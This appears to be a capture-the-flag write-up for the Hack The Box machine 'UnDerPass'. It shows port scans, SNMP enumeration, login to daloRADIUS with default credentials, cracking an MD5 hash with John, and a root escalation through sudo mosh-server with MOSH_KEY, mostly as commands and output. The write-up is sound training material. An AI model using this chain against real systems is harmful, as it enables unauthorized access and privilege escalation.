Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 22 Dec 2024
IP: 10.10.11.48

🕵️ Enumeration & Initial Access

🔍 Nmap Scan

1
2
3
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
  • 22 – SSH
  • 80 – Apache Web Server (default page)

🌐 Web Enumeration

Tried directory brute-forcing and subdomain enumeration, but didn’t find anything of interest.

1
gobuster dir -u http://10.10.11.48/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50

No useful directories discovered.

📡 SNMP Enumeration

I ran another Nmap scan targeting UDP ports and discovered SNMP was enabled:

1
2
PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server; net-snmp SNMPv3 server (public)

Nmap output also indicated the hostname: UnDerPass.htb

Used snmpbulkwalk to extract additional details:

1
snmpbulkwalk -c public -v2c 10.10.11.48 .

Output (relevant):

1
2
3
iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"

Found the username: steve@underpass.htb and a hint that the site runs daloRADIUS.

User Flag

Direct access to /daloradius/ resulted in a 403 Forbidden. But accessing the login page directly worked:

1
http://underpass.htb/daloradius/app/operators

I tried the default credentials from the daloRADIUS GitHub page:

  • Username: administrator
  • Password: radius

Login successful!

Inside the admin panel, I found:

  • Username: svcMosh
  • Hash: 412DD4759978ACFCC81DEAB01B382403

htb-underdog1.png

Cracked the hash using John:

1
2
3
4
5
6
7
8
9
john hash --wordlist=/mnt/f/ctf/wordlists/rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
underwaterfriends (svcMosh)
1g 0:00:00:01 DONE (2025-05-09 16:28) 0.6849g/s 2044Kp/s 2044Kc/s 2044KC/s undiamassinverte..underarrest
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Logged in via SSH:

1
2
3
4
5
ssh svcMosh@UnDerPass.htb
svcMosh@underpass.htb's password:

svcMosh@underpass:~$ cat user.txt
**4ccca47fa068cc44dd1eecxxxxxxxxxxx**

✅ Logged in successfully and obtained the user flag.

🚀 Root Flag

Discovered that svcMosh can run mosh-server with sudo:

Reference: https://github.com/mobile-shell/mosh

1
2
3
4
5
6
7
8
9
10
11
12
svcMosh@underpass:~$ sudo /usr/bin/mosh-server


MOSH CONNECT 60001 FwF7QVKV1oqn9+pXWixPxg

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 41245]

Used mosh-client to connect locally:

1
2
svcMosh@underpass:~$ mosh-client 127.0.0.1 60001
MOSH_KEY environment variable not found.

Set the environment variable and reconnect: https://manpages.debian.org/unstable/mosh/mosh-client.1.en.html

1
MOSH_KEY=FwF7QVKV1oqn9+pXWixPxg mosh-client 127.0.0.1 60001

Got a root shell!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro

 System information as of Fri May  9 10:36:10 AM UTC 2025

  System load:  0.0               Processes:             226
  Usage of /:   58.7% of 6.56GB   Users logged in:       0
  Memory usage: 18%               IPv4 address for eth0: 10.10.11.48
  Swap usage:   0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



root@underpass:~# cat /root/root.txt
d4780713174c58bc514a408xxxxxxxxx
root@underpass:~#

🎉 Got the root flag!